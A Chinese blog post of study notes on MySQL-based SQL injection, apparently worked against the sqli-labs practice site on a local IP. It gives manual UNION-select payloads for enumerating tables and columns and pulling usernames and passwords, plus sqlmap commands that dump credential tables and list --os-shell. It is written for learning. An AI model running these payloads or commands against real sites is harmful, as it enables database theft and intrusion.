<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="author" content="明 尘">
    
    
    
    
    
    
    <title>sql注入1 | 文心雕龙</title>
    <link href="http://example.com" rel="prefetch" />

    
<link rel="stylesheet" href="/css/bootstrap.min.css">
<link rel="stylesheet" href="/css/aos.css">
<link rel="stylesheet" href="/css/style.css">

    
<script src="/js/jquery.min.js"></script>

    
<script src="/js/bootstrap.min.js"></script>

    
<script src="/js/aos.js"></script>

    
<script src="/js/highslide/highslide-full.min.js"></script>

    
<link rel="stylesheet" href="/js/highslide/highslide.css">

    <style type="text/css">
        @media (max-width: 768px) {
            body {
                background-color: #f0f0f0;
                background: url('/imgs/xsbg.gif');
                background-attachment: fixed;
            }
        }
    </style>
    
    <!--<script type="text/javascript">
      if (document.images) {
        var avatar = new Image();
        avatar.src = '/imgs/avatar.jpg'
        var previews = 'preview1.jpg,preview2.jpg,preview3.jpg,preview4.jpg,preview5.jpg,preview6.jpg,preview7.jpg'.split(',')
        var previewsPreLoad = []
        for(var i = 0; i < length; i++) {
          previewsPreLoad.push(new Image())
          previewsPreLoad[previewsPreLoad.length - 1].src = '/imgs/preview' + previews[i]
        }
      }
    </script>-->
<meta name="generator" content="Hexo 7.0.0"></head>
<body>
    <!-- 背景轮播图功能 -->
    <section class="hidden-xs">
    <ul class="cb-slideshow">
        <li><span>天若</span></li>
        <li><span>有情</span></li>
        <li><span>天亦老</span></li>
        <li><span>我为</span></li>
        <li><span>长者</span></li>
        <li><span>续一秒</span></li>
    </ul>
</section>
    <!-- 欧尼酱功能, 谁用谁知道 -->
    
    <header class="navbar navbar-inverse" id="gal-header">
    <div class="container">
        <div class="navbar-header">
            <button type="button" class="navbar-toggle collapsed"
                    data-toggle="collapse" data-target=".bs-navbar-collapse"
                    aria-expanded="false">
                <span class="fa fa-lg fa-reorder"></span>
            </button>
            <a href="http://example.com">
                
                <style>
                    #gal-header .navbar-brand {
                        height: 54px;
                        line-height: 24px;
                        font-size: 28px;
                        opacity: 1;
                        background-color: rgba(0,0,0,0);
                        text-shadow: 0 0 5px #fff,0 0 10px #fff,0 0 15px #fff,0 0 20px #228DFF,0 0 35px #228DFF,0 0 40px #228DFF,0 0 50px #228DFF,0 0 75px #228DFF;
                    }
                </style>
                <!-- 这里使用文字(navbar_text or config.title) -->
                <div class="navbar-brand">文心雕龙</div>
                
            </a>
        </div>
        <div class="collapse navbar-collapse bs-navbar-collapse">
            <ul class="nav navbar-nav" id="menu-gal">
                
                
                <li class="">
                    <a href="/">
                        <i class="fa fa-home"></i>首页
                    </a>
                </li>
                
                
                
                <li class="">
                    <a href="/archives">
                        <i class="fa fa-archive"></i>归档
                    </a>
                </li>
                
                
                
                
                <li class="dropdown">
                    <!-- TODO 添加hover dropdown效果 -->
                    <a href="#" class="dropdown-toggle" data-toggle="dropdown"
                       aria-haspopup="true" aria-expanded="false" data-hover="dropdown">
                        <i class="fa fa-list"></i>分类
                    </a>
                    <ul class="dropdown-menu">
                        
                        
                        <li>
                            <a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/">网络安全</a>
                        </li>
                        
                        <li>
                            <a href="/categories/web%E5%89%8D%E7%AB%AF/">web前端</a>
                        </li>
                        
                        <li>
                            <a href="/categories/php/">php</a>
                        </li>
                        
                        
                        <li>
                            <a href="/categories">...</a>
                        </li>
                        
                        
                    </ul>
                </li>
                
                
                
                
                
                <li class="dropdown">
                    <!-- TODO 添加hover dropdown效果 -->
                    <a href="#" class="dropdown-toggle" data-toggle="dropdown"
                       aria-haspopup="true" aria-expanded="false" data-hover="dropdown">
                        <i class="fa fa-tags"></i>标签
                    </a>
                    <ul class="dropdown-menu">
                        
                        
                        <li>
                            <a href="/tags/Linux/">Linux</a>
                        </li>
                        
                        <li>
                            <a href="/tags/%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">基础知识</a>
                        </li>
                        
                        <li>
                            <a href="/tags/DNS%E5%9F%9F%E5%90%8D%E8%A7%A3%E6%9E%90/">DNS域名解析</a>
                        </li>
                        
                        
                        <li>
                            <a href="/tags">...</a>
                        </li>
                        
                        
                    </ul>
                </li>
                
                
                
                
                <li class="">
                    <a href="/about">
                        <i class="fa fa-user"></i>关于我
                    </a>
                </li>
                
                
            </ul>
        </div>
    </div>
</header>
    <div id="gal-body">
        <div class="container">
            <div class="row">
                <div class="col-md-8 gal-right" id="mainstay">
                    
<article class="article well article-body" id="article">
    <div class="breadcrumb">
        <i class="fa fa-home"></i>
        <a href="http://example.com">文心雕龙</a>
        >
        <span>sql注入1</span>
    </div>
    <!-- 大型设备详细文章 -->
    <div class="hidden-xs">
        <div class="title-article">
            <h1>
                <a href="/2023/12/19/sql%E6%B3%A8%E5%85%A51/">sql注入1</a>
            </h1>
        </div>
        <div class="tag-article">
            
            <span class="label label-gal">
                <i class="fa fa-tags"></i>
                
                <a href="/tags/sql-%E6%B3%A8%E5%85%A5/">sql 注入</a>, 
                
                <a href="/tags/sqlmap/">sqlmap</a>, 
                
                <a href="/tags/%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2/">联合查询</a>
                
            </span>
            
            <span class="label label-gal">
                <i class="fa fa-calendar"></i> 2023-12-19
            </span>
            
        </div>
    </div>
    <!-- 小型设备详细文章 -->
    <div class="visible-xs">
        <center>
            <div class="title-article">
                <h4>
                    <a href="/2023/12/19/sql%E6%B3%A8%E5%85%A51/">sql注入1</a>
                </h4>
            </div>
            <p>
                <i class="fa fa-calendar"></i> 2023-12-19
            </p>
            <p>
                
                <i class="fa fa-tags"></i>
                
                <a href="/tags/sql-%E6%B3%A8%E5%85%A5/">sql 注入</a>, 
                
                <a href="/tags/sqlmap/">sqlmap</a>, 
                
                <a href="/tags/%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2/">联合查询</a>
                
                
                
            </p>
        </center>
    </div>
    <div class="content-article">
        <h1 id="sql基础知识"><a href="#sql基础知识" class="headerlink" title="sql基础知识"></a>sql基础知识</h1><p>从mysql5.0开始,MySQL自带information_schema数据库，它提供了访问数据库元数据的方式。</p>
<p>information_schema：是MySQL自带的数据库，主要保持MySQL数据库服务器的系统信息，比如数据库的名称，数据库表的名称，字段名称，存储权限等。</p>
<p>performance_schema：是MySQL系统自带的数据库，可以用来监控MySQL的各类性能指标。</p>
<p>sys：是MySQL系统自带的数据库，主要作用是，以一种更容易被理解的方式展示MySQL数据库服务器的各类性能指标。</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231220192234338.png" alt="image-20231220192234338"></p>
<p>​	use 数据库名，就是当前数据库。。</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231220192639763.png" alt="image-20231220192639763"></p>
<p>show databases会显示当前连接有哪些数据库。show tables会显示当前数据库的表。</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231220193108062.png" alt="image-20231220193108062"></p>
<p>select直接加数字时，可以不写后面的表名，那么它输出的内容就是我们select后的数字。</p>
<p>单纯的输入select 1,2,3;会输出</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231220193335768.png" alt="image-20231220193335768"></p>
<h2 id="sql函数语法："><a href="#sql函数语法：" class="headerlink" title="sql函数语法："></a>sql函数语法：</h2><p>查库：select schema_name from information_schema.schemata<br>查表：select table_name from information_schema.tables where table_schema&#x3D;’security’<br>查列：select column_name from information_schema.columns where table_name&#x3D;’users’<br>查字段：select username,passord from security.users<br>查系统用户：select system_user()<br>查数据库：select database()<br>查版本信息：select version()<br>查安装路径：select @@datadir<br>查操作系统：select @@version_compile_os</p>
<p>group_concat( [DISTINCT] 要连接的字段 [Order BY 排序字段 ASC&#x2F;DESC] [Separator ‘分隔符’] )</p>
<p>group_concat只有与group by语句同时使用才能产生效果 所以使用 GROUP_CONCAT（）函数必须对源数据进行分组，否则所有数据会被合并成一行</p>
<p> 实例select group_concat(id,”<del>“,username,”</del>“,password) from users ;</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231220191511657.png" alt="image-20231220191511657"></p>
<p>select 1,group_concat(column_name) ,3 from information_schema.columns where table_name&#x3D;’users’ and table_schema&#x3D;database();查询列名</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231220193916112.png" alt="image-20231220193916112"></p>
<p>select 1,group_concat(table_name) ,3 from information_schema.tables where table_schema&#x3D;database();查询表名</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231220194130540.png" alt="image-20231220194130540"></p>
<p>select group_concat(id,”<del>“,username,”</del>“,password) from users ;</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231220194254707.png" alt="image-20231220194254707"></p>
<h1 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h1><h3 id="判断注入点-——-第一步"><a href="#判断注入点-——-第一步" class="headerlink" title="判断注入点 —— 第一步"></a>判断注入点 —— 第一步</h3><p>找页面与数据库<strong>产生交互</strong>的地方。</p>
<p>找到界面中的 url ：</p>
<p>url中 ’ ? ’ 后跟的就是参数<code>id=1</code>，’ <strong>?</strong> ’ 表示<strong>传参</strong>。一般来讲 ’ ? ‘的内容都是用户可控的。若不存在能够与数据库产生交互的地方，那么sql注入也就自然无处下手了。<br>这里<code>id=</code>后面的内容就可以进行参数修改啦。</p>
<p>传入SQL语句可控参数分为两类</p>
<ul>
<li>数字类型，参数不用被引号引用 <code>?id=1</code></li>
<li>其他类型，参数需要被引号引用 <code>?name=&quot;phone&quot;</code></li>
</ul>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231220194954989.png" alt="image-20231220194954989"></p>
<h3 id="判断字段数-——-第二步"><a href="#判断字段数-——-第二步" class="headerlink" title="判断字段数 —— 第二步"></a>判断字段数 —— 第二步</h3><p>使用<strong>order by</strong>子句，利用网页报错判断字段数，为下一步铺垫。</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231220195314678.png" alt="image-20231220195314678"></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231220195344758.png" alt="image-20231220195344758"></p>
<p>order by 3正确order by4报错，说明字段有3个。</p>
<h3 id="判断回显点-——-第三步"><a href="#判断回显点-——-第三步" class="headerlink" title="判断回显点 —— 第三步"></a>判断回显点 —— 第三步</h3><p>使用union select语句，联合查询，通过页面回显找到回显点，再利用其获取我们需要查询的数据。</p>
<p>UNION 结果集中的列名<strong>总是等于</strong> UNION 中第一个 SELECT 语句中的<strong>列名</strong>。联合查询前后的两个表，<strong>第一个表的字段数与第二个表的字段数必须相等</strong>，否则就会报错。如果一个表的字段数与第二个表的字段数不相等，我们可以进行如下操作手动补全：</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231220200001704.png" alt="image-20231220200001704"></p>
<p>发现，这个界面与初始界面一模一样。<br>因为这里<strong>优先显示的是联合查询的第一个结果，而第二个结果未被显示</strong>。<br>所以我们只需要在这里<strong>使联合查询的第一个结果不显示</strong>（使前半段语句为假，则不返回任何内容）：id&#x3D;-1或者id&#x3D;1 and 1&#x3D;2</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231220200241055.png" alt="image-20231220200241055"></p>
<p>回显点就在”<strong>Your Login Name</strong>“和”<strong>Password</strong>“ 后的位置。</p>
<h3 id="查询相关内容-——-第四步"><a href="#查询相关内容-——-第四步" class="headerlink" title="查询相关内容 —— 第四步"></a>查询相关内容 —— 第四步</h3><p><a target="_blank" rel="noopener" href="http://help.wopus.org/mysql-manage/607.html">information_schema</a> : mysql数据库5.0以上版本，自带数据库，记录了mysql下所有的<strong>库名，表名，列名</strong>等信息。</p>
<p>schemata表 (mysql服务器中所有<strong>数据库信息</strong>的表)</p>
<p>tables表 (mysql服务器中所有<strong>表信息</strong>的表)</p>
<p><strong>columns表</strong>（mysql服务器所有<strong>列信息</strong>的表）</p>
<p>table_schema 数据库名</p>
<p>table_name 表名</p>
<p>column_name 列名</p>
<h4 id="判断库名"><a href="#判断库名" class="headerlink" title="判断库名"></a>判断库名</h4><p>MySQL中的 <strong>database()函数</strong> 返回默认或当前数据库的名称。</p>
<p>在刚刚的回显点加入database函数，以此得到库名</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231220203216278.png" alt="image-20231220203216278"></p>
<h4 id="判断表名"><a href="#判断表名" class="headerlink" title="判断表名"></a>判断表名</h4><p>从表中选取数据:</p>
<blockquote>
<p>SELECT_(列名1,2,3,…)_ FROM _(表名)</p>
</blockquote>
<p>注意这里不能直接写表名tables， 否则它会在<code>error</code>库下找tables表，找不到就会报错。<br>因此需要使用【库名.表名】的格式：security.tables</p>
<p>where子句用于规定选择的标准</p>
<p>我们需要查询的是scurity 库的表名，因此在查询中限定table_schema&#x3D;’security’.也就是返回本张表中所有table_schema这一字段的值为security的数据所对应的table_name值。这里显示位只有两个，而我们查到的数据不止2条，我们需求是把所有查到的表都显示出来，所以我们要用group_concat()函数连接起来作为一行显示。</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231220212115182.png" alt="image-20231220212115182"></p>
<h4 id="判断列名"><a href="#判断列名" class="headerlink" title="判断列名"></a>判断列名</h4><p>同理，列<code>column_name</code>在表<code>information_schema.column</code>下<br>union后修改为</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231220214132382.png" alt="image-20231220214132382"></p>
<h4 id="查询信息"><a href="#查询信息" class="headerlink" title="查询信息"></a>查询信息</h4><p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231220213345078.png" alt="image-20231220213345078"></p>
<h2 id="关于字符型、数值型的判断"><a href="#关于字符型、数值型的判断" class="headerlink" title="关于字符型、数值型的判断"></a>关于字符型、数值型的判断</h2><table>
<thead>
<tr>
<th>$id</th>
<th>数字型（id&#x3D;$id）</th>
<th>字符型 （id&#x3D;’$id’）</th>
</tr>
</thead>
<tbody><tr>
<td>1 and 1&#x3D;1</td>
<td>id&#x3D;1 and 1&#x3D;1 返回正常</td>
<td>id&#x3D;‘1 and 1&#x3D;1’ 返回正常</td>
</tr>
<tr>
<td>1 and 1&#x3D;2</td>
<td>id&#x3D;1 and 1&#x3D;2 返回错误</td>
<td>id&#x3D;‘1 and 1&#x3D;2’ 返回正常</td>
</tr>
<tr>
<td>1 or 1&#x3D;1</td>
<td>id&#x3D; 1 or 1&#x3D;1 返回正常</td>
<td>id&#x3D; ‘1 or 1&#x3D;1’ 返回正常</td>
</tr>
<tr>
<td>1 or 1&#x3D;2</td>
<td>id&#x3D;1 or 1&#x3D;2 返回正常</td>
<td>id&#x3D;‘1 or 1&#x3D;2’ 返回正常</td>
</tr>
<tr>
<td>1’</td>
<td>id&#x3D;1’ 返回错误</td>
<td>id&#x3D;‘1’’ 返回错误</td>
</tr>
<tr>
<td>1’ –+</td>
<td>id&#x3D;1’ –+ 返回错误</td>
<td>id&#x3D;‘1’ –+’’ 返回正常</td>
</tr>
</tbody></table>
<h1 id="sqlmap"><a href="#sqlmap" class="headerlink" title="sqlmap"></a>sqlmap</h1><p>​	SQLmap是一款「自动化」<a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=SQL%E6%B3%A8%E5%85%A5&spm=1001.2101.3001.7020">SQL注入</a>工具，kali自带。路径 &#x2F;usr&#x2F;share&#x2F;sqlmap</p>
<p>打开终端，输入<code>sqlmap</code>，出现以下界面，就说明SQLmap「可用」。</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231223212418256.png" alt="image-20231223212418256"></p>
<p>​     或者Sqlmap官网：<a target="_blank" rel="noopener" href="http://sqlmap.org/%EF%BC%8CSqlmap%E7%9A%84%E5%AE%89%E8%A3%85%E9%9C%80%E8%A6%81Python%E7%8E%AF%E5%A2%83%EF%BC%8C%E6%9C%80%E6%96%B0%E7%89%88%E5%8F%AF%E4%BB%A5%E8%BF%90%E8%A1%8C%E5%9C%A8">http://sqlmap.org/，Sqlmap的安装需要Python环境，最新版可以运行在</a> Python 2.6, 2.7 和 3.x 版本的任何平台上。</p>
<p>下载完成后可以添加进环境变量，方便使用（不添加也可以用）</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/2021021723551258.png" alt="在这里插入图片描述"></p>
<h2 id="Sqlmap简介"><a href="#Sqlmap简介" class="headerlink" title="Sqlmap简介"></a>Sqlmap简介</h2><p>​	Sqlmap是一个开源的渗透测试工具，可以用来自动化的检测，利用SQL注入漏洞，获取数据库服务器的权限。它具有功能强大的检测引擎，针对各种不同类型数据库的渗透测试的功能选项，包括获取数据库中存储的数据，访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。</p>
<p>​	目前支持的数据库有MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access等大多数据库。</p>
<h2 id="Sqlmap支持的注入方式："><a href="#Sqlmap支持的注入方式：" class="headerlink" title="Sqlmap支持的注入方式："></a>Sqlmap支持的注入方式：</h2><p>Sqlmap全面支持六种SQL注入技术：</p>
<p>​	基于布尔类型的盲注：即可以根据返回页面判断条件真假的注入。</p>
<p>​	基于时间的盲注：即不能根据页面返回的内容判断任何信息，要用条件语句查看时间延迟语句是否已执行(即页面返回时间是否增加)来判断。</p>
<p>​	基于报错注入：即页面会返回错误信息，或者把注入的语句的结果直接返回到页面中。</p>
<p>​	联合查询注入：在可以使用Union的情况下的注入。</p>
<p>​	堆查询注入：可以同时执行多条语句时的注入。</p>
<p>​    数据库指纹识别:通过识别数据库指纹，实现特定数据库的注入</p>
<pre><code>带外注入：构造SQL语句，这些语句在呈现给数据库时会触发数据库系统创建与攻击者控制的外部服务器的连接。以这种方式，攻击者可以收集数据或可能控制数据库的行为。
</code></pre>
<h2 id="Sqlmap输出级别："><a href="#Sqlmap输出级别：" class="headerlink" title="Sqlmap输出级别："></a>Sqlmap输出级别：</h2><p>使用 Sqlmap 对一个注入点进行测试时，可以使用 -v x 参数指定回显信息的复杂度，x范围为[0~6]，共有 7 个等级，默认为 1。</p>
<p>0：只显示python错误以及严重的信息。<br>1：同时显示基本信息和警告信息。（默认）<br>2：同时显示debug信息。<br>3：同时显示注入的payload。<br>4：同时显示HTTP请求。<br>5：同时显示HTTP响应头。<br>6：同时显示HTTP响应页面。<br>如果想看到 Sqlmap 发送的测试 payload 最好的等级就是3，例：</p>
<p><code>sqlmap.py -v 3 -u &quot;http://www.xxx.com/a.php?id=x&quot;</code></p>
<p>可以输入sqlmap -h来查找帮助命令。</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231223212740535.png" alt="image-20231223212740535"></p>
<p>  用法: python3 sqlmap [选项]</p>
<p>  选项:<br>    -h, –help            显示基本帮助信息并退出<br>    -hh                   显示高级帮助信息并退出<br>    –version             显示程序版本号并退出<br>    -v VERBOSE            冗长输出级别: 0-6 (默认 1)</p>
<pre><code>目标:
  至少需要提供以下选项之一来定义目标

  -u URL, --url=URL   目标URL (例如 &quot;http://www.site.com/vuln.php?id=1&quot;)
  -g GOOGLEDORK       使用Google dork结果作为目标URL

请求:
  这些选项可用于指定如何连接到目标URL

  --data=DATA         通过POST发送的数据字符串 (例如 &quot;id=1&quot;)
  --cookie=COOKIE     HTTP Cookie头的值 (例如 &quot;PHPSESSID=a8d127e..&quot;)
  --random-agent      使用随机选择的HTTP用户代理头值
  --proxy=PROXY       使用代理连接到目标URL
  --tor               使用Tor匿名网络
  --check-tor         检查Tor是否被正确使用

注入:
  这些选项可用于指定要测试哪些参数，提供自定义注入载荷和可选的篡改脚本

  -p TESTPARAMETER    可测试的参数(s)
  --dbms=DBMS         强制指定后端DBMS

检测:
  这些选项可用于自定义检测阶段

  --level=LEVEL       执行测试的级别 (1-5, 默认 1)
  --risk=RISK         执行测试的风险等级 (1-3, 默认 1)

技术:
  这些选项可用于调整特定SQL注入技术的测试

  --technique=TECH..  要使用的SQL注入技术 (默认 &quot;BEUSTQ&quot;)

枚举:
  这些选项可用于枚举后端数据库管理系统的信息、结构和表中包含的数据

  -a, --all           获取所有信息
  -b, --banner        获取DBMS横幅
  --current-user      获取DBMS当前用户
  --current-db        获取DBMS当前数据库
  --passwords         枚举DBMS用户密码哈希
  --dbs               枚举DBMS数据库
  --tables            枚举DBMS数据库表
  --columns           枚举DBMS数据库表列
  --schema            枚举DBMS模式
  --dump              转储DBMS数据库表条目
  --dump-all          转储所有DBMS数据库表条目
  -D DB               枚举的DBMS数据库
  -T TBL              要枚举的DBMS数据库表(s)
  -C COL              要枚举的DBMS数据库表列(s)

操作系统访问:
  这些选项可用于访问后端数据库管理系统底层操作系统

  --os-shell          提示输入交互操作系统shell
  --os-pwn            提示输入OOB shell、Meterpreter或VNC

一般:
  这些选项可用于设置一些通用的工作参数

  --batch             从不要求用户输入，使用默认行为
  --flush-session     清除当前目标的会话文件

杂项:
  这些选项不属于任何其他类别

  --wizard            针对入门用户的简易向导界面
</code></pre>
<p>若要查看完整的选项列表，请使用 ‘-hh’ 选项运行</p>
<p>利用sqlmap进行注入查询出表名。</p>
<p>sqlmap  -u “<a target="_blank" rel="noopener" href="http://192.168.2.113/sqli/Less-1/?id=1">http://192.168.2.113/sqli/Less-1/?id=1</a>“  –batch -D security –tables </p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231223213033186.png" alt="image-20231223213033186"></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231223213104336.png" alt="image-20231223213104336"></p>
<p>查询id和用户名字段sqlmap  -u “<a target="_blank" rel="noopener" href="http://192.168.2.113/sqli/Less-1/?id=1">http://192.168.2.113/sqli/Less-1/?id=1</a>“   –batch -D security -T users -C “id,username” –dump</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231223213558975.png" alt="image-20231223213558975"></p>
<p>查询有哪些数据库</p>
<p>-r XX.txt   –dbs (-r指定POST请求所在的路径)</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231227155628710.png" alt="image-20231227155628710"></p>
<p>查询security数据库中有哪些表</p>
<p>-r XX.txt -D security –tables</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231227155841152.png" alt="image-20231227155841152"></p>
<p>查询security数据库中users表有哪些字段   security.users</p>
<p>-r XX.txt  -D security -T users –columns</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231227155946459.png" alt="image-20231227155946459"></p>
<p>dump出字段username与password中的数据</p>
<p>-r XX.txt   -D security -T users -C “username,password” –dump</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20231227160052840.png" alt="image-20231227160052840"></p>

    </div>
</article>


                </div>
                <aside class="col-md-4 gal-left" id="sidebar">
    <!-- 此为sidebar的搜索框, 非搜索结果页面 -->
<aside id="sidebar-search">
    <div class="search hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <form class="form-inline clearfix" id="search-form" method="get"
              action="/search/index.html">
            <input type="text" name="s" class="form-control" id="searchInput" placeholder="搜索文章~" autocomplete="off">
            <button class="btn btn-danger btn-gal" type="submit">
                <i class="fa fa-search"></i>
            </button>
        </form>
    </div>
</aside>
    <aside id="sidebar-author">
    <div class="panel panel-gal" data-aos="flip-right" data-aos-duration="3000">
        <div class="panel-heading" style="text-align: center">
            <i class="fa fa-quote-left"></i>
            明 尘
            <i class="fa fa-quote-right"></i>
        </div>
        <div class="author-panel text-center">
            <img src="/imgs/avatar.jpg" width="140" height="140"
                 alt="个人头像" class="author-image">
            <p class="author-description"></p>
        </div>
    </div>
</aside>
    
    <aside id="sidebar-recent_comments">
    <div class="panel panel-gal recent hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <div class="panel-heading">
            <i class="fa fa-comments"></i>
            最新评论
            <i class="fa fa-times-circle panel-remove"></i>
            <i class="fa fa-chevron-circle-up panel-toggle"></i>
        </div>
        <ul class="list-group list-group-flush"></ul>
    </div>
</aside>
    
    <!-- 要配置好leancloud才能开启此小工具 -->
    
    
    <aside id="sidebar-recent_posts">
    <div class="panel panel-gal recent hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <div class="panel-heading">
            <i class="fa fa-refresh"></i>
            近期文章
            <i class="fa fa-times-circle panel-remove"></i>
            <i class="fa fa-chevron-circle-up panel-toggle"></i>
        </div>
        <ul class="list-group list-group-flush">
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/08/tg%E6%B3%A8%E5%86%8C%E5%92%8C%E6%B0%B8%E6%81%92%E4%B9%8B%E9%BB%91/">tg注册和永恒之黑</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/07/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/">信息收集</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/04/virtual%E5%92%8Cpicachu/">virtual和pikachu</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/02/%E6%B8%97%E9%80%8F%E5%92%8C%E9%9D%B6%E6%9C%BA/">渗透和靶机</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/01/sqlmap/">sqlmap</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/01/waf%E5%92%8CBP/">waf和BP</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/27/sql%E7%BB%95%E8%BF%87/">T1</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/22/python3/">python3</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/21/sql%E6%B3%A8%E5%85%A52/">sql注入2</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/19/sql%E6%B3%A8%E5%85%A51/">sql注入1</a>
                </span>
            </li>
            
        </ul>
    </div>
</aside>
    
    
    <aside id="sidebar-rand_posts">
    <div class="panel panel-gal recent hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <div class="panel-heading">
            <i class="fa fa-refresh"></i>
            随机文章
            <i class="fa fa-times-circle panel-remove"></i>
            <i class="fa fa-chevron-circle-up panel-toggle"></i>
        </div>
        <ul class="list-group list-group-flush">
            
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/16/php%E5%AE%9E%E6%93%8D/">php实操</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/12/php%E5%AD%A6%E4%B9%A0/">php学习</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/06/python%E5%AD%A6%E4%B9%A0/">python学习</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/01/sqlmap/">sqlmap</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/19/sql%E6%B3%A8%E5%85%A51/">sql注入1</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/27/sql%E7%BB%95%E8%BF%87/">T1</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/21/sql%E6%B3%A8%E5%85%A52/">sql注入2</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/08/vue%E5%AD%A6%E4%B9%A0/">vue学习</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/07/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/">信息收集</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/08/tg%E6%B3%A8%E5%86%8C%E5%92%8C%E6%B0%B8%E6%81%92%E4%B9%8B%E9%BB%91/">tg注册和永恒之黑</a>
                </span>
            </li>
            
        </ul>
    </div>
</aside>
    
    
    <aside id="gal-sets">
        <div class="panel panel-gal hidden-xs" data-aos="fade-up" data-aos-duration="2000">
            <ul class="nav nav-pills pills-gal">

                
                <li>
                    <a href="/2023/12/19/sql%E6%B3%A8%E5%85%A51/index.html#sidebar-tags" data-toggle="tab" id="tags-tab">热门标签</a>
                </li>
                
                
                <li>
                    <a href="/2023/12/19/sql%E6%B3%A8%E5%85%A51/index.html#sidebar-friend-links" data-toggle="tab" id="friend-links-tab">友情链接</a>
                </li>
                
                
                <li>
                    <a href="/2023/12/19/sql%E6%B3%A8%E5%85%A51/index.html#sidebar-links" data-toggle="tab" id="links-tab">个人链接</a>
                </li>
                
            </ul>
            <div class="tab-content">
                
                <div class="cloud-tags tab-pane nav bs-sidenav fade" id="sidebar-tags">
    
    <a href="/tags/Linux/" style="font-size: 14.759554139947504px;" class="tag-cloud-link">Linux</a>
    
    <a href="/tags/%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" style="font-size: 16.66828393692954px;" class="tag-cloud-link">基础知识</a>
    
    <a href="/tags/DNS%E5%9F%9F%E5%90%8D%E8%A7%A3%E6%9E%90/" style="font-size: 19.78370212612689px;" class="tag-cloud-link">DNS域名解析</a>
    
    <a href="/tags/HTML/" style="font-size: 11.163640504425391px;" class="tag-cloud-link">HTML</a>
    
